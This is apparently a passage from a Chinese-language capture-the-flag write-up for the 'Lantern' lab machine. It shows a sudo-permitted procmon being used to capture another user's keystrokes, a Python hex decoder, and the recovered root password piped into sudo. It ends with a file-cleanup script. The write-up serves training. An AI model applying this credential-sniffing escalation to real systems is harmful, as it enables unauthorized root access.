tomas@lantern:~$ cat /var/mail/$(whoami) From hr@lantern.htb Mon Jan 1 12:00:00 2023 Subject: Welcome to Lantern!
Hi Tomas,
Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.
While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.
Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.
Exciting times ahead!
Best.
按照要求尝试查看/root/automation.sh,但是权限不足。
1 2 3 4 5 6 7 8
tomas@lantern:~$ sudo -l Matching Defaults entries for tomas on lantern: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tomas may run the following commands on lantern: (ALL : ALL) NOPASSWD: /usr/bin/procmon
import binascii # Read the content from out.txt with open('out.txt', 'r') as file: hex_data = file.read().strip().replace('\n', '') # Convert hex data to binary binary_data = binascii.unhexlify(hex_data) # Decode the binary data to a string try: decoded_string = binary_data.decode('utf-8', errors='replace') except UnicodeDecodeError: decoded_string = binary_data.decode('latin1', errors='replace')
print("Decoded Data:\n") print(decoded_string)
运行结果中能注意到:
1
echo Q 33EEddddttddww33ppMMBB | s uuddoo . //bbaacckkuupp..sshh
#!/bin/bash # Directory to clean up in /opt/components DIR_COMPONENTS="/opt/components" # Files to exclude in /opt/components EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll") # Convert exclude files array to a pattern for grep EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}") EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1} # Remove leading '|' # Find and delete files not in the exclude list in /opt/components /usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do /bin/rm -f "$file" done # Directory to clean up in /var/www/sites/lantern.htb/static/images DIR_IMAGES="/var/www/sites/lantern.htb/static/images" # Files to exclude in /var/www/sites/lantern.htb/static/images EXCLUDE_FILES_IMAGES=("about-1.jpg" "about-2.jpg" "about.jpg" "avatar-1.jpg" "avatar-2.jpg" "avatar.jpg" "bg-bot.jpg" "bg-top.jpg" "blog-1.jpg" "blog-2.jpg" "blog-3.jpg") # Convert exclude files array to a pattern for grep EXCLUDE_PATTERN_IMAGES=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_IMAGES[@]}") EXCLUDE_PATTERN_IMAGES=${EXCLUDE_PATTERN_IMAGES:1} # Remove leading '|' # Find and delete files not in the exclude list in /var/www/sites/lantern.htb/static/images /usr/bin/find "$DIR_IMAGES" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_IMAGES" | while read -r file; do /bin/rm -f "$file" done